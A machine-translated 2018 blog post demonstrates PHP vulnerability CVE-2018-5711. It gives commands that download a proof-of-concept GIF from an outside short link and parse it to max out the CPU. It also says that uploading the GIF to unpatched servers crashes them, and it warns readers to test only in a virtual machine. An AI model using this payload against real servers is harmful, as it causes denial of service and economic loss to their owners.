Current location: home page > Industry trends >Text content

Taiwan hackers found that a dynamic diagram can shut down a server, and operation and maintenance will be busy again this month

Dazzle Yi Three years ago (2018-02-03) Industry trends one thousand three hundred and forty-eight

There are so many talents in China. Orange, a hacker in Taiwan, has found a vulnerability, No. PHP cve-2018-5711. This vulnerability can instantly shut down the server supporting PHP. I will use Kali 2017.3 virtual machine to demonstrate it.


1、 Check if my virtual machine has a PHP GD library


1. Run command:

 php -m | grep -i gd

 Taiwan hackers found that a dynamic diagram can shut down a server, and operation and maintenance will be busy this month

2. If GD doesn't appear in the above figure, we need to install it. Run command

 apt-get install php-gd。

 Taiwan hackers found that a dynamic diagram can shut down a server, and operation and maintenance will be busy this month

2、 Generating malicious GIF files

1、

 curl -L https://git.io/vN0n4 | xxd -r > poc.gif


 Taiwan hackers found that a dynamic diagram can shut down a server, and operation and maintenance will be busy this month. 3


2. Run the top command to see my CPU usage

 Taiwan hackers found that a dynamic diagram can shut down a server, and operation and maintenance will be busy this month. 4

3. Testing malicious code:

 php -r 'imagecreatefromgif("poc.gif");'

 Taiwan hackers found that a dynamic diagram can shut down a server, and operation and maintenance will be busy this month. 5


The CPU rose to 100% instantly. I want to run the top command again. I can't do a CPU comparison chart. I have to restart my Kali.


The scope of versions affected by this vulnerability is as follows:

 PHP 5 < 5.6.33
PHP 7.0 < 7.0.27
PHP 7.1 < 7.1.13
PHP 7.2 < 7.2.1

If the server supports PHP GD library, upload the generated poc.gif, and the server will be down. Finally, I would like to solemnly say that some servers have not been fixed for this loophole. If you make a prank, it will cause economic losses to the other party and violate the state security Law, so be sure to test in the virtual machine, understand the principle of this vulnerability.


Comment list

 Ji Changxin
Three years ago (2018-02-28)

https://blog.isoyu.com/archives/gongyiapi.html
Do you want to write an article for promotion

Dazzle Yi reply:
Seriously, I don't know much about API
Three years ago (2018-03-30)
 Gcod
Three years ago (2018-02-14)

Front row onlookers

 Ji Changxin
Three years ago (2018-02-08)

Big guy, big guy

Comment

 visitor

Welcome to participate in the discussion. Please express your views and exchange your views here.
Call for istwar